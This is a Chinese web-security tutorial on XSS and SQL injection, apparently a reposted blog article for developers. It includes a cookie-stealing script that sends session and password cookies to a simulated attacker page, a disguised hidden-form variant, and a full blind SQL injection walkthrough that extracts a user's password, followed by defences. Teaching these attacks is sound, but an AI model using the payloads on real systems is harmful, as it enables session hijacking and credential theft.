免责申明:对于此内容仅是提供参考,用于开发人员针对黑客攻击做好安全防范
XSS攻击:
跨站脚本在英文中称为Cross-Site Scripting,缩写为CSS。但是,由于层叠样式表 (Cascading Style Sheets)的缩写也为CSS,为不与其混淆,特将跨站脚本缩写为XSS。
跨站脚本,顾名思义,就是恶意攻击者利用网站漏洞往Web页面里插入恶意代码,一般需要以下几个条件:
客户端访问的网站是一个有漏洞的网站,但是他没有意识到;
在这个网站中通过一些手段放入一段可以执行的代码,吸引客户执行(通过鼠标点击等);
客户点击后,代码执行,可以达到攻击目的。
XSS属于被动式的攻击。为了让读者了解XSS,首先我们举一个简单的例子。有一个应用,负责进行书本查询,代码如下:
query.jsp
1 <%@ page language="java" import="java.util.*"
2 pageEncoding="gb2312"%>
3 欢迎查询书本
4 <form action="queryResult.jsp" method="post">
5 请您输入书本的信息:<BR>
6 <input name="book" type="text" size="50">
7 <input type="submit" value="查询">
8 </form>
运行结果如下:
运行query.jsp,输入正常数据,如"Java":
提交,显示的结果是:
结果没有问题。但是该程序有漏洞。比如,客户输入"<I><FONT SIZE=7>Java</FONT></I>":
查询显示的结果为:
更有甚者,我们可以输入某个网站上的一幅图片地址(此处引用google首页上的logo图片):
显示结果为:
很显然,结果很不正常!
以上只是说明了该表单提交没有对标记进行检查,还没有起到攻击的作用。为了进行攻击,我们将输入变成脚本:
8.4.1 跨站脚本攻击的原理(2)
提交,结果为:
说明脚本也可以执行,打开queryResult.jsp客户端源代码,为:
于是,程序可以让攻击者利用脚本进行一些隐秘信息的获取了!输入如下查询关键字:
提交,得到结果:
消息框中,将当前登录的sessionId显示出来了。很显然,该sessionId如果被攻击者知道,就可以访问服务器端的该用户session,获取一些信息。
提示
在JSP系列中, sessionId保存在Cookie中。
实际的攻击是怎样进行的呢?如前所述,攻击者为了得到客户的隐秘信息,一般会在网站中通过一些手段放入一段可以执行的代码,吸引客户执行(通过鼠标点击等);客户点击后,代码执行,可以达到攻击目的。比如,可以给客户发送一个邮件,吸引客户点击某个链接。
以下模拟了一个通过邮件点击链接的攻击过程。攻击者给客户发送一个邮件,并且在电子邮件中,通过某个利益的诱惑,鼓动用户尽快访问某个网站,并在邮件中给一个地址链接,这个链接的URL中含有脚本,客户在点击的过程中,就执行了这段代码。
我们模拟一个邮箱系统,首先是用户登录页面,当用户登录成功后,为了以后操作方便,该网站采用了"记住登录状态"的功能,将自己的用户名和密码放入cookie,并保存在客户端:
login.jsp
1 <%@ page language="java" import="java.util.*"
2 pageEncoding="gb2312"%>
3 欢迎登录邮箱
4 <form action="login.jsp" method="post">
5 请您输入账号:
6 <input name="account" type="text">
7 <BR>
8 请您输入密码:
9 <input name="password" type="password">
10 <BR>
11 <input type="submit" value="登录">
12 </form>
13 <%
14 //获取账号密码
15 String account = request.getParameter("account");
16 String password = request.getParameter("password");
17 if(account!=null)
18 {
19 //验证账号密码,假如账号密码相同表示登录成功
20 if(account.equals(password))
21 {
22 //放入session,跳转到下一个页面
23 session.setAttribute("account",account);
24 //将自己的用户名和密码放入cookie
25 response.addCookie(new Cookie("account",account));
26 response.addCookie(new Cookie("password",password));
27 response.sendRedirect("loginResult.jsp");
28 }
29 else
30 {
31 out.println("登录不成功");
32 }
33 }
34 %>
8.4.1 跨站脚本攻击的原理(3)
运行,得到界面如下:
输入正确的账号密码(如guokehua,guokehua),如果登录成功,程序跳到loginResult.jsp,并在页面底部有一个"查看邮件"链接(当然,可能还有其他功能,在此省略)。代码如下:
loginResult.jsp
1 <%@ page language="java" import="java.util.*" pageEncoding="gb2312"%>
2 <%//session检查
3 String account = (String)session.getAttribute("account");
4 if(account==null)
5 {
6 response.sendRedirect("login.jsp");
7 }
8 %>
9 欢迎<%=account%>来到邮箱!
10 <HR>
11 <a href="mailList.jsp">查看邮箱</a>
运行效果如下:
为了模拟攻击,点击"查看邮箱",我们在里面放置一封"邮件"(该邮件的内容由攻击者撰写)。代码如下:
mailList.jsp
1 <%@ page language="java" import="java.util.*" pageEncoding="gb2312"%>
2 <%
3 //session检查,代码略
4 %>
5 <!—以下是攻击者发送的一个邮件-->
6 这里有一封新邮件,您中奖了,您有兴趣的话可以点击:<BR>
7 <script type="text/javascript">
8 function send()
9 {
10 var cookie = document.cookie;
11 window.location.href = "
12 http://localhost/attackPage.asp?cookies=" + cookie;
13 }
14 </script>
15 <a onClick="send()"><u>领奖</u></a>
效果如下:
注意,这里的"领奖"链接,链接到另一个网站,该网站一般是攻击者自行建立。,为了保证真实性,我们在IIS下用ASP写了一个网页,因为攻击者页面和被攻击者页面一般不是在一个网站内,其URL为:
1 http://localhost/attackPage.asp
很明显,如果用户点击,脚本中的send函数会运行,并将内容发送给http://localhost/attackPage.asp。假设http://localhost/attackPage.asp的源代码如下:
http://localhost/attackPage.asp
1 <%@ Language = "VBScript" %>
2 这是模拟的攻击网站(IIS)<BR>
3 刚才从用户处得到的cookie值为:<BR>
4 <%=request("cookies")%>注意,attackPage.asp要在IIS中运行,和前面的例子运行的不是一个服务器。
用户如果点击了"领奖"链接,attackPage.jsp上显示:
Cookie中的所有值都被攻击者知道了!特别是sessionId的泄露,说明攻击者还具有了访问session的可能!
此时,客户浏览器的地址栏上URL变为(读者运行时,具体内容可能不一样,但是基本效果相同):
http://localhost/attackPage.asp?cookies=account
=guokehua;%20password=guokehua;%20JSESSIONID=
135766E8D33B380E426126474E28D9A9;%2
0ASPSESSIONIDQQCADQDT=KFELIGFCPPGPHLFEDCKIPKDF8.4.1 跨站脚本攻击的原理(4)
从这个含有恶意的脚本的URL中,比较容易发现受到了攻击,因为URL后面的查询字符串一眼就能看出来。聪明的攻击者还可以将脚本用隐藏表单隐藏起来。将mailList.jsp的代码改为:
mailList.jsp
1 <%@ page language="java" import="java.util.*"
2 pageEncoding="gb2312"%>
3 <%
4 //session检查,代码略
5 %>
6 <!—以下是攻击者发送的一个邮件-->
7 这里有一封新邮件,您中奖了,请您填写您的姓名并且提交:<BR>
8 <script type="text/javascript">
9 function send()
10 {
11 var cookie = document.cookie;
12 document.form1.cookies.value=cookie;
13 document.form1.submit();
14 }
15 </script>
16 <form name="form1" action="http://
17 localhost/attackPage.asp" method="post">
18 输入姓名:<input name="">
19 <input type="hidden" name="cookies">
20 <input type="button" value="提交姓名" onClick="send()">
21 </form>
该处将脚本用隐藏表单隐藏起来。输入姓名的文本框只是一个伪装。效果为:
attackPage.asp不变。不管你输入什么姓名,到达attackPage.asp都会显示:
也可以达到攻击目的。而此时,浏览器地址栏中显示为:
用户不知不觉受到了攻击。
提示
实际攻击的过程中,cookie的值可以被攻击者保存到数据库或者通过其他手段得知,也就是说,cookie的值不可能直接在攻击页面上显示,否则很容易被用户发现,这里只是模拟。
从以上例子可以看出,XSS可以诱使Web站点执行本来不属于它的代码,而这些行代码由攻击者提供、为用户浏览器加载,攻击者利用这些代码执行来获取信息。XSS涉及到三方,即攻击者、客户端与客户端访问的网站。XSS的攻击目标是盗取客户端的敏感信息。从本质上讲,XSS漏洞终究原因是由于网站的Web应用对用户提交请求参数未做充分的检查过滤。
SQL注入
什么是SQL注入攻击?引用百度百科的解释:
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。[1] 比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.
SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
详细步骤:(相关文件下载在最后)
1.针对给出的WEB系统运行AspWebServer
2.进入登录页面进行SQL注入漏洞测试
正常登录:
用户名:admin 密码:admin
SQL注入漏洞测试:
-
在正常用户名admin后增加一个单引号,单击"登录"
-
或在URL地址栏直接输入http://172.18.3.13:81/login.asp?name=admin'&pass=admin
-
若出错,证明没有对'进行过滤,存在SQL注入漏洞
在正常用户名admin后增加一个单引号,单击"登录"
出错
在URL地址栏直接输入http://172.18.3.13:81/login.asp?name=admin'&pass=admin
登录出错
登录出错,证明存在SQL注入漏洞。
3.SQL注入攻击
构造可以正常运行的目标地址
-
输入http://172.18.3.13:81/login.asp?name=admin &pass=admin' and '1=1
-
原SQL语句为SELECT * FROM data Where uname='admin',条件未变,但接收密码为admin' and '1=1
-
登录失败
-
输入http://172.18.3.13:81/login.asp?pass=admin&name=admin' and 1=1 and 'a'='a
-
原SQL语句为SELECT * FROM data Where uname='admin' and 1=1 and 'a'='a'
-
登录成功
可以正常运行的目标地址已经构造成功,此时可将1=1部分用SQL查询语句替代,依次对数据库表名、表中字段名、用户和密码长度、用户和密码进行测试
4. 猜解数据库表名
-
http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (select count(*) from data)>0 and 'a'='a
-
成功,说明数据表名确为data;若不成功,则可反复测试,直至成功猜出表名
5. 猜解数据库字段名
-
http://172.18.3.13:81/login.asp?pass=admin&name=admin'and (select count(uname) from data)>0 and 'a'='a
-
若用户名字段确为uname,则提示登录成功
-
同理可猜出密码字段为upass
猜测用户名字段为name,登录出错
猜测用户名字段为uname,登录成功
说明数据库中用户名字段为uname
猜测密码字段为upass,登录成功
说明数据库中密码字段为upass
6.猜解密码长度
-
已知有一用户名为"wucm",首先猜其密码长度大于1
-
http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)>1)>0 and 'a'='a
成功,说明用户"wucm"的密码大于1, 继续猜测密码长度小于10
-
http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)<10)>0 and 'a'='a
成功,说明"wucm"的密码长度小于10位,继续猜测其密码长度小于5
-
http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)<5)>0 and 'a'='a
出错,说明"wucm"的密码长度大于5位,继续猜测其密码长度大于8位
-
http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)>8)>0 and 'a'='a
出错,说明"wucm"的密码长度小于8位,继续猜测其密码长度等于6位
-
http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)=6)>0 and 'a'='a
成功,说明"wucm"的密码长度为6位
7.猜解密码
根据前面的测试我们已经知道该用户的密码长度位6位,接下来对密码进行逐位猜测:
首先测试第一位是否为数字
-
http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and mid(upass,1,1)<'9')>0 and 'a'='a
出错,说明密码第一位不是数字, 测试是否位字母
-
http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and mid(upass,1,1)>'a')>0 and 'a'='a
成功,基本说明密码第一位是字母, 接下来重复测试,不断缩小字母范围,最后确定密码第一位为字母"w"
-
http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and mid(upass,1,1)='w')>0 and 'a'='a
成功,说明密码第一位位"w"
同理对6位密码逐位进行猜测,最后得到密码为"wcm987"
至此我们就猜测出用户"wucm"的密码为"wcm987",进行登陆测试:
登录成功,证明整个猜测过程和最后得出的密码都是正确的
防范SQL注入攻击的方法:
既然SQL注入式攻击的危害这么大,那么该如何来防治呢?下面这些建议或许对数据库管理员防治SQL注入式攻击有一定的帮助。
1、 普通用户与系统管理员用户的权限要有严格的区分。
如果一个普通用户在使用查询语句中嵌入另一个Drop Table语句,那么是否允许执行呢?由于Drop语句关系到数据库的基本对象,故要操作这个语句用户必须有相关的权限。在权限设计中,对于终端用户,即应用软件的使用者,没有必要给他们数据库对象的建立、删除等权限。那么即使在他们使用SQL语句中带有嵌入式的恶意代码,由于其用户权限的限制,这些代码也将无法被执行。故应用程序在设计的时候,最好把系统管理员的用户与普通用户区分开来。如此可以最大限度的减少注入式攻击对数据库带来的危害。
2、 强迫使用参数化语句。
如果在编写SQL语句的时候,用户输入的变量不是直接嵌入到SQL语句。而是通过参数来传递这个变量的话,那么就可以有效的防治SQL注入式攻击。也就是说,用户的输入绝对不能够直接被嵌入到SQL语句中。与此相反,用户的输入的内容必须进行过滤,或者使用参数化的语句来传递用户输入的变量。参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。采用这种措施,可以杜绝大部分的SQL注入式攻击。不过可惜的是,现在支持参数化语句的数据库引擎并不多。不过数据库工程师在开发产品的时候要尽量采用参数化语句。
3、 加强对用户输入的验证。
总体来说,防治SQL注入式攻击可以采用两种方法,一是加强对用户输入内容的检查与验证;二是强迫使用参数化语句来传递用户输入的内容。在SQLServer数据库中,有比较多的用户输入内容验证工具,可以帮助管理员来对付SQL注入式攻击。测试字符串变量的内容,只接受所需的值。拒绝包含二进制数据、转义序列和注释字符的输入内容。这有助于防止脚本注入,防止某些缓冲区溢出攻击。测试用户输入内容的大小和数据类型,强制执行适当的限制与转换。这即有助于防止有意造成的缓冲区溢出,对于防治注入式攻击有比较明显的效果。
如可以使用存储过程来验证用户的输入。利用存储过程可以实现对用户输入变量的过滤,如拒绝一些特殊的符号。如以上那个恶意代码中,只要存储过程把那个分号过滤掉,那么这个恶意代码也就没有用武之地了。在执行SQL语句之前,可以通过数据库的存储过程,来拒绝接纳一些特殊的符号。在不影响数据库应用的前提下,应该让数据库拒绝包含以下字符的输入。如分号分隔符,它是SQL注入式攻击的主要帮凶。如注释分隔符。注释只有在数据设计的时候用的到。一般用户的查询语句中没有必要注释的内容,故可以直接把他拒绝掉,通常情况下这么做不会发生意外损失。把以上这些特殊符号拒绝掉,那么即使在SQL语句中嵌入了恶意代码,他们也将毫无作为。
故始终通过测试类型、长度、格式和范围来验证用户输入,过滤用户输入的内容。这是防止SQL注入式攻击的常见并且行之有效的措施。
4、 多多使用SQL Server数据库自带的安全参数。
为了减少注入式攻击对于SQL Server数据库的不良影响,在SQLServer数据库专门设计了相对安全的SQL参数。在数据库设计过程中,工程师要尽量采用这些参数来杜绝恶意的SQL注入式攻击。
如在SQL Server数据库中提供了Parameters集合。这个集合提供了类型检查和长度验证的功能。如果管理员采用了Parameters这个集合的话,则用户输入的内容将被视为字符值而不是可执行代码。即使用户输入的内容中含有可执行代码,则数据库也会过滤掉。因为此时数据库只把它当作普通的字符来处理。使用Parameters集合的另外一个优点是可以强制执行类型和长度检查,范围以外的值将触发异常。如果用户输入的值不符合指定的类型与长度约束,就会发生异常,并报告给管理员。如上面这个案例中,如果员工编号定义的数据类型为字符串型,长度为10个字符。而用户输入的内容虽然也是字符类型的数据,但是其长度达到了20个字符。则此时就会引发异常,因为用户输入的内容长度超过了数据库字段长度的限制。
5、 多层环境如何防治SQL注入式攻击?
在多层应用环境中,用户输入的所有数据都应该在验证之后才能被允许进入到可信区域。未通过验证过程的数据应被数据库拒绝,并向上一层返回一个错误信息。实现多层验证。对无目的的恶意用户采取的预防措施,对坚定的攻击者可能无效。更好的做法是在用户界面和所有跨信任边界的后续点上验证输入。如在客户端应用程序中验证数据可以防止简单的脚本注入。但是,如果下一层认为其输入已通过验证,则任何可以绕过客户端的恶意用户就可以不受限制地访问系统。故对于多层应用环境,在防止注入式攻击的时候,需要各层一起努力,在客户端与数据库端都要采用相应的措施来防治SQL语句的注入式攻击。
6、 必要的情况下使用专业的漏洞扫描工具来寻找可能被攻击的点。
使用专业的漏洞扫描工具,可以帮助管理员来寻找可能被SQL注入式攻击的点。不过漏洞扫描工具只能发现攻击点,而不能够主动起到防御SQL注入攻击的作用。当然这个工具也经常被攻击者拿来使用。如攻击者可以利用这个工具自动搜索攻击目标并实施攻击。为此在必要的情况下,企业应当投资于一些专业的漏洞扫描工具。一个完善的漏洞扫描程序不同于网络扫描程序,它专门查找数据库中的SQL注入式漏洞。最新的漏洞扫描程序可以查找最新发现的漏洞。所以凭借专业的工具,可以帮助管理员发现SQL注入式漏洞,并提醒管理员采取积极的措施来预防SQL注入式攻击。如果攻击者能够发现的SQL注入式漏洞数据库管理员都发现了并采取了积极的措施堵住漏洞,那么攻击者也就无从下手了。
7、设置陷阱账号:
设置两个帐号,一个是普通管理员帐号,一个是防注入的帐号。将防注入的账号设置的很象管理员,如 admin,以制造假象吸引软件的检测,而密码是大于千字以上的中文字符,迫使软件分析账号的时候进入全负荷状态甚至资源耗尽而死机。
攻击与防御一直是对立存在的两面,有新的攻击方式就会有更好的防护方法!在计算机网络方面两者更是通过长期竞争实现共同的进步;任何系统都不是完美的,既然我们不能开发出绝对安全的系统,那我们就要时刻防范各种可能的攻击。出现漏洞及时修复,这样才能保证我们系统的安全与稳定!
6934
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
